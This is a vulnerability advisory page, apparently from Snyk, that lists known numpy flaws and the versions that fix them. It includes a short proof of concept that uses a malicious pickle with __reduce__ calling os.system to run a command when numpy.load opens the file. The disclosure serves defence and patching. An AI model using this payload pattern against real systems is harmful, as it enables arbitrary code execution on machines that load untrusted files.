numpy@1.5.0 vulnerabilities

Fundamental package for array computing in Python

  • latest version

    2.2.1

  • latest non vulnerable version

  • first published

    18 years ago

  • latest version published

    1 days ago

  • licenses detected

  • Direct Vulnerabilities

    Known vulnerabilities in the numpy package. This does not include vulnerabilities belonging to this package’s dependencies.

    How to fix?

    Automatically find and fix vulnerabilities affecting your projects. Snyk scans for vulnerabilities and provides fixes for free.

    Fix for free
    VulnerabilityVulnerable Version
    • L
    Buffer Overflow

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Buffer Overflow in the PyArray_NewFromDescr_int function of ctors.c when specifying arrays of large dimensions (over 32) from Python code.

    How to fix Buffer Overflow?

    Upgrade numpy to version 1.21.0rc1 or higher.

    [,1.21.0rc1)
    • L
    Buffer Overflow

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Buffer Overflow due to missing boundary checks in the array_from_pyobj function of fortranobject.c. This may allow an attacker to conduct Denial of Service by carefully constructing an array with negative values.

    How to fix Buffer Overflow?

    Upgrade numpy to version 1.22.0 or higher.

    [,1.22.0)
    • L
    NULL Pointer Dereference

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to NULL Pointer Dereference due to missing return-value validation in the PyArray_DescrNew function, which may allow attackers to conduct Denial of Service attacks by repetitively creating and sort arrays.

    Note: This may likely only happen if application memory is already exhausted, as it requires the newdescr object of the PyArray_DescrNew to evaluate to NULL.

    How to fix NULL Pointer Dereference?

    Upgrade numpy to version 1.22.2 or higher.

    [0,1.22.2)
    • L
    Denial of Service (DoS)

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Denial of Service (DoS) due to an incomplete string comparison in the numpy.core component, which may allow attackers to fail the APIs via constructing specific string objects.

    How to fix Denial of Service (DoS)?

    Upgrade numpy to version 1.22.0rc1 or higher.

    [,1.22.0rc1)
    • C
    Arbitrary Code Execution

    numpy is a fundamental package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Arbitrary Code Execution. It uses the pickle Python module unsafely, which allows remote attackers to execute arbitrary code via a crafted serialized object, as demonstrated by a numpy.load call.

    PoC by nanshihui:

    import numpy
    from numpy import __version__
    print __version__
    import os
    import  pickle
    class Test(object):
        def __init__(self):
            self.a = 1
    
        def __reduce__(self):
            return (os.system,('ls',))
    tmpdaa = Test()
    with open("a-file.pickle",'wb') as f:
        pickle.dump(tmpdaa,f)
    numpy.load('a-file.pickle')
    

    How to fix Arbitrary Code Execution?

    Upgrade numpy to version 1.16.3 or higher.

    [0,1.16.3)
    • M
    Symlink Attack

    numpy is a package needed for scientific computing with Python.

    Affected versions of this package are vulnerable to Symlink Attack. It allows local users to write to arbitrary files via a symlink attack on a temporary file.

    How to fix Symlink Attack?

    Upgrade numpy to version 1.8.2 or higher.

    [,1.8.2)
    • H
    Denial of Service (DoS)

    numpy is a package for scientific computing with Python.

    Affected versions of this package are vulnerable to Denial of Service (DoS)due to missing input validation. An empty list or an array will stick into an infinite loop.

    How to fix Denial of Service (DoS)?

    Upgrade numpy to version 1.13.3 or higher.

    [,1.13.3)
    • M
    SymLink Attack

    numpy is a array processing for numbers, strings, records, and objects. ' Affected versions of this package are vulnerable to Symlink attacks.

    [,1.8.1)